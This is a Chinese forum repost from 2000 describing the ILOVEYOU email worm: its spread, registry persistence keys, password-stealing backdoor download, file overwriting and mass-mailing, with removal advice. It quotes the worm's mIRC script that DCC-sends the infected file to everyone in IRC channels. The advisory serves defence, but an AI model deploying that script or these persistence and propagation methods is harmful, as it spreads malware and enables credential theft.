发信人: johnswood()
整理人: mkwolf(2000-05-06 10:14:15), 站内信件
|
I Love You
这个新病毒传播之快和造成的损失这大,太令人吃惊了。
它5月4日8:00am(GMT)从菲律宾首都马尼拉出现,半小时后,它到了香港,
使亚洲的财经公司受到重创,再过1小时后欧洲成了下一个受害者,短短的时间
内,十分之一的公司受到感染,英国、瑞士、丹麦的议会成了级别较高的受害
者。可能因为美国人对I love you信件不再感到惊奇,又过三小时后,它才到
了美国。到5月4日晚,它所造成的损失可能高达10亿英镑。
病毒特征
它类似美丽莎病毒,通过电子邮件传染。
主题:ILOVEYOU
内容:
kindly check the attached LOVELETTER coming from me.
附件:
LOVE-LETTER-FOR-YOU.TXT.vbs
当附件补打开后,计算机被传染。病毒开始工作。
修改和创建多个注册表项。
自动利用IE下载一个后门程序,然后把被感染机器的网络密码传到一个菲律
宾的邮件帐号。创建许多自己的副本,感染本地机器,重写一些特定的数据
文件(VBScript, JavaScript, JPEG, MP2/MP3)。
通过Outlook和mIRC扩散自己,以传染他人。
主要过程:
- - 修改HKEY_CURRENT_USER\Software\Microsoft\
Windows Scripting Host\Settings\Timeout注册项
- - 复制自己到 SYSTEMDIR\MSKernel32.vbs, WINDIR\Win32DLL.vbs,
SYSTEMDIR\LOVE-LETTER-FOR-YOU.TXT.vbs.
- - 在注册表项 HKEY_LOCAL_MACHINE下创建:
\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
- - 在windos SYSTEMDIR 创建一个HTML文件LOVE-LETTER-FOR-YOU.HTM用于mIRC
.
- - 通过Outlook给地址薄的每一个邮件地址发一拷贝。发送完每个拷贝后,
在注册表中把相应的地址作标记。病毒在注册表中记录已发送邮件数目和地址
薄中所存邮件地址数目,如果地址薄中多了邮件地址,它是不会放过的。
这些所有的标记在注册表中HKEY_CURRENT_USER\Software\Microsoft\WAB.
- - 病毒利用IE从4个web站点中的一个下载一个后门程序WIN-BUGSFIX.EXE.
这个后门程序捕捉网络密码,并把它发给一个菲律宾的电子邮件帐号。在IE启
动前,它修改 \Software\Microsoft\Internet Explorer\Main\Start Page
注册项,为4个站点中的一个,当后门程序被下载后,再把它设为"bout:blank".
- - 接下来,在注册表设置
\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE
- - 病毒查找所有的连接到系统的中的固定和可移动的驱动器,用自己把扩展
名为vbs/vbe/js/jse/css/wsh/sct/hta的所有文件覆盖。病毒还用自己覆盖
所有的.jpg和.jpeg文件,并在原文件名后加.vbs后缀。把所有的mp2/mp3文
件的属性改为隐藏,把每一个声音文件名子,加上.vbs后缀,创建一个病毒拷
贝。
- - 如果在机器中发现"mirc32.exe", "mlink32.exe", "mirc.ini",
"script.ini", "mirc.hlp" 中的任一文件, 在同个目录中创建文件
"script.ini"。
[script]
;mIRC Script
; Please dont edit this script... mIRC will corrupt, if mIRC will
; corrupt... WINDOWS will affect and will not run correctly. thanks
;
;Khaled Mardam-Bey
;http://www.mirc.com
;
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
n3=}
这个script试图发送前面生成的HTML文件到计算机使用者所在的IRC中的每
个参与者.
病毒清除:
请参看
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LOV
ELETTER
--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 212.212.254.39]
|
|